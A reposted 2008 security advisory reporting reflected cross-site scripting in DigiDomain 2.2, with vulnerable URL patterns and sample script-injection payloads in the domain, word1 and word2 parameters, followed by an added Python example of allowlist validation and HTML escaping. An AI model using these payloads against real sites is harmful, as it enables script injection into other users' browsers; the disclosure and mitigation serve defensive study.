Computer Security
[EN] securityvulns.ru
From: xx_hack_xx_2004_(at)_hotmail.com <xx_hack_xx_2004_(at)_hotmail.com>
Date: 27.03.2008
Subject: Multiple XSS in DigiDomain

Hello
I'm re-posting this message from the actual message which was on Tue-29 May 2007 because my old message got live example,

anyway :
Vulnerable : DigiDomain
Version: 2.2
web : http://www.digiappz.com


XSS :
1-
http://site.com/lookup/lookup_result.asp?domain=[XSS]&tld=.com

2-
http://www.site.com/lookup/suggest_result.asp?domain=.com&tld=&user=&selecte=1&word1=[XSS]&word2=[XSS]

Example :
1-
http://site.com/lookup/lookup_result.asp?domain='><script>alert(1);</script>&tld=.com

2-
http://www.site.com/lookup/suggest_result.asp?domain=.com&tld=&user=&selecte=1&word1='><script>alert(1);</script>&word2='><script>alert(1);</script>


Discovered By Linux_Drox

LeZr.Com

Best Regards ,,,
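
The following is an added example, not part of the original post and not DigiDomain code: a Python illustration of the two server-side controls that stop the reflected values above, an allowlist on the `domain`, `tld`, `word1` and `word2` parameters and HTML-encoding at output. It assumes the value is echoed into a single-quoted HTML attribute (inferred from the `'>` prefix in the posted example); the function names, the `<input>` markup and the allowlist pattern are hypothetical.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Parameters named in the advisory's two URLs.
REFLECTED_PARAMS = ("domain", "tld", "word1", "word2")

# Assumption: legitimate values are empty or consist only of letters,
# digits, dots and hyphens (domain-name characters).
SAFE_VALUE = re.compile(r"[A-Za-z0-9.-]{0,253}")

def rejected_params(url):
    """Return {param: value} for each reflected parameter failing the allowlist."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True, separator="&")
    bad = {}
    for name in REFLECTED_PARAMS:
        for value in query.get(name, []):
            if not SAFE_VALUE.fullmatch(value):
                bad[name] = value
    return bad

def render_unescaped(value):
    """Before: raw value concatenated into a single-quoted attribute (assumed sink)."""
    return "<input name='domain' value='" + value + "'>"

def render_escaped(value):
    """After: encode & < > " and ' so the value cannot close the attribute."""
    return "<input name='domain' value='" + html.escape(value, quote=True) + "'>"

# Constructed sample requests, built from the URL shapes in the advisory.
PAYLOAD = "'><script>alert(1);</script>"
SAMPLES = [
    "http://site.com/lookup/lookup_result.asp?domain=example&tld=.com",
    "http://site.com/lookup/lookup_result.asp?domain=" + PAYLOAD + "&tld=.com",
    "http://www.site.com/lookup/suggest_result.asp?domain=.com&tld=&user=&selecte=1"
    "&word1=" + PAYLOAD + "&word2=" + PAYLOAD,
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(sorted(rejected_params(url)) or "accepted", "<-", url)
    print(render_unescaped(PAYLOAD))
    print(render_escaped(PAYLOAD))
```

Validation rejects the request early, while encoding at the output point remains the control that holds even if a value bypasses validation or reaches the page by another route.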
